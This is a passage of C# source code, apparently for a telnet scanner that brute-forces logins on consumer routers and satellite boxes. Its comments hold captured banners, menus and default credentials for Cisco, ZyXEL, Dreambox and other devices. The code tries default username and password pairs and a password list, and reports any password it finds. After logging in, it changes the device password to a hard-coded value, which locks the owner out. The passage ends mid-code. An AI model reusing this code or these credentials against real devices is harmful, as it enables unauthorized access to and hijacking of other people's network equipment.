- //Sending 5, 100-byte ICMP Echos to 8.8.8.8, timeout is 2 seconds:
- //!!!!!
- //Success rate is 100 percent (5/5), round-trip min/avg/max = 44/45/48 ms
- //GPBM>
- //GPBM>show ?
- //backup Backup status
- //c1700 Show c1700 information
- //cca CCA information
- //cdapi CDAPI information
- //class-map Show QoS Class Map
- //clock Display the system clock
- //compress Show compression statistics
- //dialer Dialer parameters and statistics
- //exception exception informations
- //flash: display information about flash: file system
- //history Display the session command history
- //hosts IP domain-name, lookup style, nameservers, and host table
- //isdn ISDN information
- //location Display the system location
- //modemcap Show Modem Capabilities database
- //policy-map Show QoS Policy Map
- //ppp PPP parameters and statistics
- //queue Show queue contents
- //queueing Show queueing configuration
- //radius Shows radius information
- //rmon rmon statistics
- //rtr Response Time Reporter (RTR)
- //sessions Information about Telnet connections
- //snmp snmp statistics
- //tacacs Shows tacacs+ server statistics
- //template Template information
- //terminal Display terminal configuration parameters
- //traffic-shape traffic rate shaping configuration
- //users Display information about terminal lines
- //version System hardware and software status
- //GPBM>show version
- //Cisco Internetwork Operating System Software
- //IOS (tm) C1700 Software (C1700-Y-M), Version 12.1(1), RELEASE SOFTWARE (fc1)
- //Copyright (c) 1986-2000 by cisco Systems, Inc.
- //Compiled Tue 14-Mar-00 16:40 by cmong
- //Image text-base: 0x80008088, data-base: 0x805B7EE0
- //ROM: System Bootstrap, Version 12.0(3)T, RELEASE SOFTWARE (fc1)
- //GPBM uptime is 5 weeks, 6 days, 45 minutes
- //System returned to ROM by power-on
- //System image file is "flash:c1700-y-mz.121-1"
- //cisco 1720 (MPC860) processor (revision 0x501) with 12288K/4096K bytes of memory
- //.
- //Processor board ID JAD04180989 (362865562), with hardware revision 0000
- //M860 processor: part number 0, mask 32
- //Bridging software.
- //X.25 software, Version 3.0.0.
- //Basic Rate ISDN software, Version 1.1.
- //1 FastEthernet/IEEE 802.3 interface(s)
- //1 Serial(sync/async) network interface(s)
- //1 ISDN Basic Rate interface(s)
- //32K bytes of non-volatile configuration memory.
- //4096K bytes of processor board System flash (Read/Write)
- //Configuration register is 0x2102
- //GPBM>show diag
- //Slot 0:
- // C1720 1FE Mainboard Port adapter, 3 ports
- // Port adapter is analyzed
- // Port adapter insertion time unknown
- // EEPROM contents at hardware discovery:
- // Hardware Revision : 5.1
- // PCB Serial Number : JAD04180989
- // Part Number : 73-3201-05
- // Board Revision : 70
- // Fab Version : 04
- // EEPROM format version 4
- // EEPROM contents (hex):
- // 0x00: 04 FF 40 00 B2 41 05 01 C1 8B 4A 41 44 30 34 31
- // 0x10: 38 30 39 38 39 82 49 0C 81 05 42 37 30 02 04 FF
- // 0x20: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
- // 0x30: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
- // 0x40: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
- // 0x50: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
- // 0x60: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
- // 0x70: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
- // WIC Slot 0:
- // Serial 1T WAN daughter card
- // Hardware revision 1.0 Board revision H0
- // Serial number 0018074153 Part number 800-01514-01
- // Test history 0x00 RMA number 00-00-00
- // Connector type WAN Module
- // EEPROM format version 1
- // EEPROM contents (hex):
- // 0x20: 01 02 01 00 01 13 CA 29 50 05 EA 01 00 00 00 00
- // 0x30: 88 00 00 00 00 01 29 01 FF FF FF FF FF FF FF FF
- // WIC Slot 1:
- // BRI S/T - 2186 WAN daughter card
- // Hardware revision 1.3 Board revision A0
- // Serial number 0019915070 Part number 800-01833-03
- // Test history 0x00 RMA number 00-00-00
- // Connector type WAN Module
- // EEPROM format version 1
- // EEPROM contents (hex):
- // 0x20: 01 07 01 03 01 2F E1 3E 50 07 29 03 00 00 00 00
- // 0x30: 50 00 00 00 00 04 25 01 FF FF FF FF FF FF FF FF
- //************************************************************************************
- //-----------------------------------------------------------------------
- //Cisco Router and Security Device Manager (SDM) is installed on this device.
- //This feature requires the one-time use of the username "cisco"
- //with the password "cisco". The default username and password have a privilege le
- //vel of 15.
- //Please change these publicly known initial credentials using SDM or the IOS CLI.
- //Here are the Cisco IOS commands.
- //username <myuser> privilege 15 secret 0 <mypassword>
- //no username cisco
- //Replace <myuser> and <mypassword> with the username and password you want to use
- //.
- //For more information about SDM please follow the instructions in the QUICK START
- //GUIDE for your router or go to http://www.cisco.com/go/sdm
- //-----------------------------------------------------------------------
- //User Access Verification
- //Username: cisco
- //Password:
- //% Login invalid
- //************************************************************************************
- //BCM96338 ADSL Router
- //Login: bad
- //Password:
- //Login incorrect. Try again.
- //Login: admin
- //Password: password
- //Note: If you have problem with Backspace key, please make sure you configure you
- //r terminal emulator settings. For instance, from HyperTerminal you would need to
- // use File->Properties->Setting->Back Space key sends.
- // Main Menu
- //1. ADSL Link State
- //2. LAN
- //3. WAN
- //4. DNS Server
- //5. Route Setup
- //6. NAT
- //7. Firewall
- //8. Quality Of Service
- //9. Management
- //10. Passwords
- //11. Diag
- //12. Reset to Default
- //13. Save and Reboot
- //14. Exit
- // ->
- //(10)
- //Note: If you have problem with Backspace key, please make sure you configure you
- //r terminal emulator settings. For instance, from HyperTerminal you would need to
- // use File->Properties->Setting->Back Space key sends.
- // Password Menu
- //1. Admin
- //2. User
- //3. Support
- //4. Exit
- ///Passwords ->
- //Note: If you have problem with Backspace key, please make sure you configure you
- //r terminal emulator settings. For instance, from HyperTerminal you would need to
- // use File->Properties->Setting->Back Space key sends.
- // Password Menu
- //1. Admin
- //2. User
- //3. Support
- //4. Exit
- ///Passwords -> 1
- // Password Configuration Menu For User admin
- //Note: Maximum length of password is 16 characters.
- //Old password :
- //New password :
- //Confirm new password:
- //Password for admin changed successfully.
- //Hit <enter> to continue
- //Note: If you have problem with Backspace key, please make sure you configure you
- //r terminal emulator settings. For instance, from HyperTerminal you would need to
- // use File->Properties->Setting->Back Space key sends.
- // DNS Menu
- //1. Configure
- //2. Show
- //3. Exit
- /// DNS Server -> 2
- //Automatic assigned IP address for DNS is enabled.
- //Primary DNS : 62.251.229.237
- //Secondary DNS: 62.251.229.223
- //Hit <enter> to continue
- //14. Exit
- // -> 14
- //Bye bye. Have a nice day!!!
- //Perte de la connexion à l'hôte.
- //************************************************************************************
- //Password: 1234
- // Copyright (c) 1994 - 2003 ZyXEL Communications Corp.
- // Prestige 650R-E1 Main Menu
- // Prestige 645 Main Menu
- //Getting Started Advanced Management
- // 1. General Setup 21. Filter Set Configuration
- // 3. LAN Setup 22. SNMP Configuration
- // 4. Internet Access Setup 23. System Password
- // 24. System Maintenance
- //Advanced Applications 25. IP Routing Policy Setup
- // 11. Remote Node Setup 26. Schedule Setup
- // 12. Static Routing Setup
- // 15. NAT Setup
- // 99. Exit
- // Enter Menu Selection Number:
- //(23)
- //
- // Menu 23 - System Password
- //Old Password= ?
- //New Password= ?
- //Retype to confirm= ?
- // Enter here to CONFIRM or ESC to CANCEL:
- //
- // Menu 4 - Internet Access Setup
- //ISP's Name= MyISP
- //Encapsulation= PPPoE
- //Multiplexing= LLC-based
- //VPI #= 8
- //VCI #= 35
- //ATM QoS Type= UBR
- // Peak Cell Rate (PCR)= 0
- // Sustain Cell Rate (SCR)= 0
- // Maximum Burst Size (MBS)= 0
- //My Login= saidi_im
- //My Password= ********
- //Idle Timeout (sec)= 0
- //IP Address Assignment= Dynamic
- // IP Address= N/A
- //Network Address Translation= SUA Only
- // Address Mapping Set= N/A
- //Press ENTER to Confirm or ESC to Cancel:
- //************************************************************************************
- //Password: 1234
- // Copyright (c) 1994 - 2004 ZyXEL Communications Corp.
- // Prestige 660HW-61 Main Menu
- //Getting Started Advanced Management
- // 1. General Setup 21. Filter Set Configuration
- // 2. WAN Backup Setup 22. SNMP Configuration
- // 3. LAN Setup 23. System Security
- // 4. Internet Access Setup 24. System Maintenance
- // 25. IP Routing Policy Setup
- //Advanced Applications 26. Schedule Setup
- // 11. Remote Node Setup
- // 12. Static Routing Setup
- // 14. Dial-in User Setup 99. Exit
- // 15. NAT Setup
- // Enter Menu Selection Number:
- //(23)
- //
- // Menu 23 - System Security
- //1. Change Password
- //2. RADIUS Server
- //4. IEEE802.1x
- //(1)
- //
- //Menu 23.1 - System Security - Change Password
- // Old Password= ?
- // New Password= ?
- // Retype to confirm= ?
- // Enter here to CONFIRM or ESC to CANCEL:
- // Enter Menu Selection Number:
- //************************************************************************************
- //(Cisco router)
- //User Access Verification
- //Username: bad
- //Password:
- //% Login invalid
- //Username: admin
- //Password:
- //% Login invalid
- //Username: admin
- //Password:
- //% Login invalid
- //Perte de la connexion à l'hôte.
- //************************************************************************************
- //**************************
- //* *
- //* The Gemini Project *
- //* *
- //**************************
- //welcome on your dreambox! - Kernel 2.6.9 (09:30:19).
- //dreambox login: root
- //Password:
- //BusyBox v1.01 (2007.08.23-20:51+0000) Built-in shell (ash)
- //Enter 'help' for a list of built-in commands.
- //root@dreambox:~>
- //root@dreambox:~> help
- //
- //Built-in commands:
- //-------------------
- // . : alias bg break cd chdir command continue eval exec exit export
- // false fg getopts hash help jobs kill let local pwd read readonly
- // return set shift times trap true type ulimit umask unalias unset
- // wait
- //root@dreambox:~> passwd
- //Changing password for root
- //Enter the new password (minimum of 5, maximum of 8 characters)
- //Please use a combination of upper and lower case letters and numbers.
- //Enter new password:
- //Re-enter new password:
- //Password changed.
- //root@dreambox:~>
- //root@dreambox:~>
- //\[ fusermount mkdir start-stop-daemon
- //ash gbox mknod streampes
- //automount gbox.ver mkswap streamripper
- //awk gdaemon mmi.socket streamsec
- //basename gdaemon.socket more streamts
- //boot grep mount stty
- //bunzip2 gunzip mv su
- //busybox gzip nc swapoff
- //bzcat halt netstat swapon
- //cat hdparm nslookup sync
- //chgrp head online.log syslogd
- //chmod hostname passwd tail
- //chown hotplug pid.info tar
- //chroot hotplug.socket pidof telnet
- //clear httpd ping telnetd
- //cp id pmt.tmp test
- //date ifconfig poweroff top
- //dd in.ftpd prockill touch
- //df in.telnetd ps true
- //dmesg inadyn pwd tty
- //dos2unix inetd rdate udhcpc
- //dropbear init reboot udpstreampes
- //dropbearkey insmod reset umount
- //dropbearmulti kill rm uname
- //du killall rmdir uniq
- //dvbnet klogd rmmod unix2dos
- //echo lcdoff route uptime
- //enigma lcdstuff sc.info usleep
- //enigmanet ln sc01.info vi
- //env loadkmap scp wc
- //eraseall logger sed wget
- //etherwake login sh which
- //expr logread showlogo whoami
- //false losetup sleep xargs
- //find ls smbmnt yes
- //flashtool lsmod smbmount zcat
- //free md5sum sort
- //************************************************************************************
- #endregion
- if (banner.Contains("dreambox"))
- {
- //dreambox login:
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("root" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> BANNERPASSWORD01: " + stringdata, myip);
- //Password:
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("dreambox" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response telnet01: " + stringdata, myip);
- }
- else
- { //Vulcan
- //login:
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> BANNERPASSWORD: " + stringdata, myip);
- //password:
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response telnet01: " + stringdata, myip);
- }
- // cisco/cisco
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response telnet01a: " + stringdata, myip);
- //Login Successful
- //login:
- if(stringdata.Contains("ogin:"))
- {
- Console.WriteLine("{0} -> BAD LOGIN/PASSWORD", myip);
- }
- else
- {
- //$
- //$passwd
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("passwd" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response telnet01b: " + stringdata, myip);
- if (banner.Contains("Vulcan"))
- {
- //Enter Old Password:
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response telnet01c: " + stringdata, myip);
- }
- else
- {
- //On a pas cette ligne sur une BusyBox ou une dreambox
- }
- //Enter New Password:
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response telnet01d: " + stringdata, myip);
- //Confirm New Password:
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response telnet01e: " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response telnet01f: " + stringdata, myip);
- //Login incorrect (dreambox)
- //Password changed
- //Set Done
- //SINON: Erreur: Combinaison nom utilisateur/mot de passe invalide
- //passwd: An error occurred updating the password file. //BusyBox
- }
- //login:
- Sock_scan.Close();
- }
- if (banner.Contains("assword:"))
- {
- #region BANNERS
- //********************************************************
- //Info:Connection was denied by remote host according to ACL!
- //********************************************************
- //Copyright (c) 2001 - 2006 TP-LINK TECHNOLOGIES CO., LTD
- //admin
- //Valid commands are:
- //sys exit ether wan
- //ip bridge dot1q pktqos
- //show set lan
- //********************************************************
- //Copyright (c) 2001 - 2006 TrendChip Technologies Corp.
- //1234
- //Valid commands are:
- //sys exit ether wan
- //etherdbg usb ip bridge
- //dot1q pktqos show set
- //lan
- //
- //tc> sys countrycode
- //country code = 253 //Djibouti
- //********************************************************
- // *******************
- // Welcome to Vulcan
- // *******************
- //Conexant Inc., Software Release 3.C10MTT0.8822A
- //Copyright (c) 2001-2003 by Conexant, Inc.
- //login:
- //admin
- //password:
- //admin
- //Login Successful
- //$
- //$help
- //Command Description
- //------- -----------
- //alias To Alias a command
- //apply Apply configuration/image file
- //commit Commit the active config to the flash
- //create Create a new entry of specified type
- //delete Delete the specified entry
- //download Download a file on to the Device
- //exit To exit the CLI shell
- //get Display info for the search
- //help Provides help
- //list List files
- //modify Modify information for specified entry
- //passwd To modify user password
- //ping The normal ping command
- //prompt Change the user prompt
- //reboot Reboot the device
- //remove Remove file
- //reset Reset info for the specified entry
- //size ATM Sizing Information
- //traceroute The normal traceroute command
- //trigger To set trigger
- //unalias To undefine previously defined alias
- //verbose Switch ON/OFF the verbose mode
- //********************************************************
- //Password: 1234
- //Copyright (c) 1994 - 2007 ZyXEL Communications Corp.
- //ras>
- //ras> help
- //Valid commands are:
- //sys exit ether wan
- //aux wlan ip ipsec
- //bridge certificates bm lan
- //vlan radius 8021x autoSec
- //ras> sys
- //packetscan adjtime callhist countrycode
- //date domainname edit extraphnum
- //feature firewall myZyxelCom hostname
- //logs stdio datetime time
- //tos trcdisp trclog trcpacket
- //version view wdog romreset
- //upnp atsh atmu ateb
- //xmodemmode diag save display
- //adminPassword userPassword default fwnotify
- //tripleplay general socket filter
- //ddns cpu winmes snmp
- //ras> sys adminPassword
- //Usage: adminPassword <new adminPassword>
- //ras> sys adminPassword j3R0m3!!
- /*
- Copyright (c) 1994 - 2003 ZyXEL Communications Corp.
- Prestige 650R-E1 Main Menu
- Getting Started Advanced Management
- 1. General Setup 21. Filter Set Configuration
- 3. LAN Setup 22. SNMP Configuration
- 4. Internet Access Setup 23. System Password
- 24. System Maintenance
- Advanced Applications 25. IP Routing Policy Setup
- 11. Remote Node Setup 26. Schedule Setup
- 12. Static Routing Setup
- 15. NAT Setup
- 99. Exit
- Enter Menu Selection Number:
- */
- /*
- Menu 1 - General Setup
- System Name= ?
- Location=
- Contact Person's Name=
- Domain Name=
- Edit Dynamic DNS= No
- Route IP= Yes
- Bridge= No
- Press ENTER to Confirm or ESC to Cancel:
- */
- /*
- Menu 23 - System Password
- Old Password= ?
- New Password= ?
- Retype to confirm= ?
- Enter here to CONFIRM or ESC to CANCEL:
- */
- /*
- Menu 3 - LAN Setup
- 1. LAN Port Filter Setup
- 2. TCP/IP and DHCP Setup
- Enter Menu Selection Number:
- */
- /*
- Menu 3.1 - LAN Port Filter Setup
- Input Filter Sets:
- protocol filters=
- device filters=
- Output Filter Sets:
- protocol filters=
- device filters=
- */
- /*
- Menu 3.2 - TCP/IP and DHCP Setup
- DHCP Setup
- DHCP= Server
- Client IP Pool Starting Address= 192.168.1.33
- Size of Client IP Pool= 32
- Primary DNS Server= 0.0.0.0
- Secondary DNS Server= 0.0.0.0
- Remote DHCP Server= N/A
- TCP/IP Setup:
- IP Address= 192.168.1.1
- IP Subnet Mask= 255.255.255.0
- RIP Direction= Both
- Version= RIP-2B
- Multicast= None
- IP Policies=
- Edit IP Alias= No
- Press ENTER to Confirm or ESC to Cancel:
- Press Space Bar to Toggle.
- */
- /*
- Menu 4 - Internet Access Setup
- ISP's Name= MyISP
- Encapsulation= PPPoE
- Multiplexing= LLC-based
- VPI #= 8
- VCI #= 35
- ATM QoS Type= UBR
- Peak Cell Rate (PCR)= 0
- Sustain Cell Rate (SCR)= 0
- Maximum Burst Size (MBS)= 0
- My Login= zemzem2
- My Password= ********
- Idle Timeout (sec)= 0
- IP Address Assignment= Dynamic
- IP Address= N/A
- Network Address Translation= SUA Only
- Address Mapping Set= N/A
- Press ENTER to Confirm or ESC to Cancel:
- */
- /*
- Menu 11 - Remote Node Setup
- 1. MyISP (ISP, SUA)
- 2. ________
- 3. ________
- 4. ________
- 5. ________
- 6. ________
- 7. ________
- 8. ________
- Enter Node # to Edit:
- */
- /*
- Menu 11.1 - Remote Node Profile
- Rem Node Name= MyISP Route= IP
- Active= Yes Bridge= No
- Encapsulation= PPPoE Edit IP/Bridge= No
- Multiplexing= LLC-based Edit ATM Options= No
- Service Name= zyxel
- Incoming: Telco Option:
- Rem Login= Allocated Budget(min)= 0
- Rem Password= ******** Period(hr)= 0
- Outgoing: Schedule Sets=
- My Login= zemzem2 Nailed-Up Connection= Yes
- My Password= ******** Session Options:
- Authen= CHAP/PAP Edit Filter Sets= No
- Idle Timeout(sec)= N/A
- Edit Traffic Redirect= No
- Press ENTER to Confirm or ESC to Cancel:
- */
- /*
- Menu 21 - Filter Set Configuration
- Filter Filter
- Set # Comments Set # Comments
- ------ ----------------- ------ -----------------
- 1 _______________ 7 _______________
- 2 _______________ 8 _______________
- 3 _______________ 9 _______________
- 4 _______________ 10 _______________
- 5 _______________ 11 _______________
- 6 _______________ 12 _______________
- Enter Filter Set Number to Configure= 0
- Edit Comments= N/A
- Press ENTER to Confirm or ESC to Cancel:
- */
- /*
- Menu 21.1 - Filter Rules Summary
- # A Type Filter Rules M m n
- - - ---- --------------------------------------------------------------- - - -
- 1 N
- 2 N
- 3 N
- 4 N
- 5 N
- 6 N
- Enter Filter Rule Number (1-6) to Configure:
- */
- /*
- Menu 21.1.1 - TCP/IP Filter Rule
- Filter #: 1,1
- Filter Type= TCP/IP Filter Rule
- Active= No
- IP Protocol= 0 IP Source Route= No
- Destination: IP Addr=
- IP Mask=
- Port #=
- Port # Comp= None
- Source: IP Addr=
- IP Mask=
- Port #=
- Port # Comp= None
- TCP Estab= N/A
- More= No Log= None
- Action Matched= Check Next Rule
- Action Not Matched= Check Next Rule
- Press ENTER to Confirm or ESC to Cancel:
- ress Space Bar to Toggle.
- */
- /*
- Menu 22 - SNMP Configuration
- SNMP:
- Get Community= public
- Set Community= public
- Trusted Host= 0.0.0.0
- Trap:
- Community= public
- Destination= 0.0.0.0
- Press ENTER to Confirm or ESC to Cancel:
- */
- /*
- Menu 24 - System Maintenance
- 1. System Status
- 2. System Information and Console Port Speed
- 3. Log and Trace
- 4. Diagnostic
- 5. Backup Configuration
- 6. Restore Configuration
- 7. Upload Firmware
- 8. Command Interpreter Mode
- 9. Call Control
- 10. Time and Date Setting
- 11. Remote Management
- Enter Menu Selection Number:
- */
- /*
- Enter Menu Selection Number: 8
- Copyright (c) 1994 - 2003 ZyXEL Communications Corp.
- ras> help
- Valid commands are:
- sys exit ether wan
- ip bridge
- ras>
- */
- /*
- Menu 24.11 - Remote Management Control
- TELNET Server:
- Server Port = 23 Server Access = ALL
- Secured Client IP = 0.0.0.0
- FTP Server:
- Server Port = 21 Server Access = ALL
- Secured Client IP = 0.0.0.0
- Web Server:
- Server Port = 80 Server Access = ALL
- Secured Client IP = 0.0.0.0
- Press ENTER to Confirm or ESC to Cancel:
- */
- //********************************************************
- //**************************
- //* *
- //* The Gemini Project *
- //* *
- //**************************
- //welcome on your dreambox! - Kernel 2.6.9 (17:51:55).
- //dreambox login: admin
- //Password:
- //Login incorrect
- //dreambox login:
- //
- //root/dreambox
- //********************************************************
- //***************************
- //* *
- //* The Gemini Project *
- //* *
- //***************************
- //* Prepared By "drhg" *
- //* ( Dream-Gaza Team ) *
- //* www.dreamgaza.com *
- //***************************
- //Checking Kernel, Please Wait ....
- //Kernel 2.6.9.
- //md5sum (dreambox Linux ppc ).
- //head.ko = 308509 bytes.
- //Safe, NO 'clone bomb' found ... Congratulations.
- //Enjoy Original Gemini Project without Time Bomb !.
- //---------------------------------------------------
- //(Friday, 17 September 2010).
- //welcome on your dreambox! - Kernel 2.6.9 (10:46:22).
- //dreambox login: bad
- //Password:
- //Login incorrect
- //dreambox login: root
- //Password:
- //Login incorrect
- //dreambox login: root
- //Password:
- //Login incorrect
- //********************************************************
- //OpenDreambox 1.5.0 dm800
- //dm800 login:
- //dm800 login: bad
- //Password:
- //Login incorrect
- //dm800 login: root
- //root@dm800:~#
- //CCcam_2011 head pyhtmlizer
- //StartNabCam hexdump python
- //\[ hostname rdjpgcom
- //addgroup hotplug readlink
- //adduser id reboot
- //ar ifconfig reboot.sysvinit
- //arping ifdown renice
- //ash ifup reset
- //automount im rjoe
- //avahi-daemon inadyn rm
- //awk inadyn_script.sh rmdir
- //basename inetd rmmod
- //bdpoll init route
- //bookify init.sysvinit rquotad
- //bunzip2 insmod run-parts
- //busybox ip runlevel
- //bzcat ipkg rx
- //cat ipkg-cl scp
- //cftp ipkg-link sed
- //chat iwconfig seq
- //chgrp iwgetid sfdisk
- //chmod iwlist sh
- //chown iwpriv sha1sum
- //chroot iwspy showiframe
- //chvt jmacs showmount
- //cjpeg joe shutdown
- //ckeygen jpegtran shutdown.sysvinit
- //clear jpico sleep
- //conch jstar smartctl
- //cp kill smartd
- //cpio killall smbd
- //crond killall5 sort
- //crontab klogd ssh
- //cut last start-stop-daemon
- //czap last.sysvinit statd
- //date lastb streamproxy
- //dbclient ldconfig strings
- //dbus-cleanup-sockets less stty
- //dbus-daemon lessecho su
- //dbus-launch lesskey sulogin
- //dbus-monitor ln swapoff
- //dbus-send loadfont swapon
- //dbus-uuidgen loadkmap sync
- //dc lockd sysctl
- //dccamd logger syslogd
- //dd login szap
- //deallocvt logname t-im
- //delgroup logread tail
- //deluser lore tap2deb
- //depmod losetup tap2rpm
- //depmod.26 ls tapconvert
- //df lsmod tar
- //dirname mailmail tda1002x
- //djpeg makedevs tee
- //dmesg manhole telinit
- //dos2unix map-mbone telnet
- //dropbear mc telnetd
- //dropbearconvert mcedit termidx
- //dropbearkey mcmfmt test
- //dropbearmulti mcview time
- //du md5sum tkconch
- //dumpkmap mesg top
- //dvbsnoop mesg.sysvinit touch
- //dvbtraffic mkdir tput
- //e2fsck mke2fs tr
- //echo mkfifo traceroute
- //egrep mkfs.ext2 trial
- //enigma2 mkfs.ext3 true
- //enigma2.sh mknod tset
- //env mkswap tty
- //ethtool mktap tuxtxt
- //exportfs mktemp twistd
- //expr modprobe tzap
- //false more udhcpc
- //fbset mount umount
- //fdisk mountd uname
- //fdisk.util-linux mountpoint uniq
- //femon mrinfo unix2dos
- //fgrep mrouted unzip
- //find mv update-alternatives
- //free nc update-inetd
- //fsck.ext2 netstat update-modules
- //fsck.ext3 nfs_server_script.sh update-passwd
- //ftpget nfsd update-rc.d
- //ftpput nfsstat uptime
- //getepgchannels nhfsgraph utmpdump
- //getkey nhfsnums uudecode
- //getty nhfsrun uuencode
- //grab nhfsstone vi
- //grep nmbd vlock
- //gst-feedback nslookup vsftpd
- //gst-feedback-0.10 od wall
- //gst-inspect openvpn wall.sysvinit
- //gst-inspect-0.10 openvpn_script.sh watch
- //gst-launch openvt wc
- //gst-launch-0.10 passwd wdog
- //gst-typefind patch wget
- //gst-typefind-0.10 pidof which
- //gst-visualise-0.10 pidof.sysvinit who
- //gst-xmlinspect ping whoami
- //gst-xmlinspect-0.10 pivot_root wpa_cli
- //gst-xmllaunch poff wpa_passphrase
- //gst-xmllaunch-0.10 pon wpa_supplicant
- //gunzip portmap wrjpgcom
- //gzip poweroff xargs
- //halt pppd yes
- //halt.sysvinit printf zcat
- //hddtemp ps zeroconf
- //hdparm pwd
- //root@dm800:~#
- //root@dm800:~# passwd
- //Changing password for root
- //Enter the new password (minimum of 5, maximum of 8 characters)
- //Please use a combination of upper and lower case letters and numbers.
- //Enter new password:
- //Re-enter new password:
- //Password changed.
- //root@dm800:~#
- //********************************************************
- //BusyBox on (none) login: bad
- //Password:
- //Login incorrect
- //BusyBox on (none) login: admin
- //Password:
- //BusyBox v0.61.pre (2008.01.25-06:33+0000) Built-in shell (ash)
- //Enter 'help' for a list of built-in commands.
- //# help
- //Built-in commands:
- //-------------------
- // . : bg break builtin cd chdir continue eval exec exit export
- // false fc fg hash help jobs kill local pwd read readonly return
- // set setvar shift times trap true type ulimit umask unset wait
- //********************************************************
- //User Access Verification
- //
- //Password:
- //Password:
- //Password:
- //% Bad passwords
- //********************************************************
- //Huawei Home Gateway 550
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //Login: bad
- //Password:
- //Login incorrect. Try again.
- //Login: admin
- //Password:
- //Login incorrect. Try again.
- //Login: admin
- //Password:
- //Authorization failed after trying 3 times!!!.
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //wl driver adapter not found
- //Login:
- #endregion
- foreach (string password in passwords)
- {
- Thread.Sleep(100);
- try
- {
- Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
- Sock_scan.Connect(ip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- // Console.WriteLine("{0} -> Banner telnet: " + stringdata, myip);
- //Console.WriteLine("DEBUG Trying Password:{0}", password);
- //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + Convert.ToChar(13) + Convert.ToChar(10)));
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password+"\r"),SocketFlags.None);
- /*
- Byte[] smk = new Byte[password.Length];
- for (int i = 0; i < password.Length; i++)
- {
- Byte ss = Convert.ToByte(password[i]);
- smk[i] = ss;
- }
- Sock_scan.Send(smk, 0, smk.Length, SocketFlags.None);
- */
- //Thread.Sleep(100);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- //Console.WriteLine("{0} -> Response telnet: " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response telnet02: " + stringdata, myip);
- if (stringdata == "")
- {
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response telnet02b: " + stringdata, myip);
- }
- //stringdata = null;
- //bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
- //stringdata = stringdata + ASCII.GetString(RecvBytes, 0, bytes);
- //Console.WriteLine("Response telnet: " + strRetPage);
- //while (bytes > 0)
- //{
- // bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
- // stringdata = stringdata + ASCII.GetString(RecvBytes, 0, bytes);
- // Console.WriteLine("Response telnet: " + strRetPage);
- //}
- //Bad Password!!!
- if (stringdata.Contains("assword:") || stringdata.Contains("Bad Password")) //stringdata.Contains("*")
- {
- // Console.WriteLine("{0} -> bad telnet password: {1}\n", myip, password);
- Sock_scan.Close();
- }
- else
- {
- Console.WriteLine("***********************************************************");
- Console.WriteLine("{0} -> TELNET PASSWORD FOUND: {1}\n", myip, password);
- Console.WriteLine("***********************************************************");
- if(stringdata.Contains("ZyXEL")) //1234
- {
- if (stringdata.Contains("Menu")) //1234
- {
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("23" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> " + stringdata, myip);
- // Menu 23 - System Password
- //Old Password= ?
- //New Password= ?
- //Retype to confirm= ?
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + "\r"), SocketFlags.None);
